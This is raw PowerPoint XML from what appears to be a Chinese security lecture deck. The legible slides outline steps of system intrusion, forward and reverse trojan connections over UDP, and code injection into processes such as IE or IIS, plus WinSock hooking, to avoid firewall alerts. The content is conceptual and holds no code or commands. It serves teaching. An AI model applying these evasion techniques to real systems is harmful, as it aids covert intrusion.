            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3276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39" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="3276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0" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3276600"/>
            <a:ext cx="4572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1" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3276600"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 375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2" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="3200400"/>
            <a:ext cx="838200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 45833"/>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4" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1"/>
              <a:t>入侵系统的常用步骤</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48946662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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713732"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7137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713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71374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13733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71373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713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>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13734"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713734"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713734"/>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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>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13735"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713735"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71373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713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>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13736"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713736"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71373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fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>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713737"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713737"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7137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2" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713733" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713734" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713735" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713736" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713737" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713738" grpId="0" animBg="1"/>
      <p:bldP spid="713739" grpId="0" animBg="1"/>
      <p:bldP spid="713740" grpId="0" animBg="1"/>
      <p:bldP spid="713741" grpId="0" animBg="1"/>
      <p:bldP spid="713742"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正向：服务端侦听，客户端连接；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反向：客户端侦听，服务端连接。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法和安全性与使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议差不多。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不可靠：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>必须在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议基础上设计一个自己的可靠的报文传递协议。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228354" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>270</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483470880"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>无论正向、反向，服务端和客户端试图建立连接时都会引起防火墙得报警。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码注入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务端将自己注入可合法与外界网络通讯的进程（如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> ICQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等）地址空间，以新线程形式运行，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者只是修改宿主进程，截获宿主进程的网络系统调用(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WinSock)。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230402" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
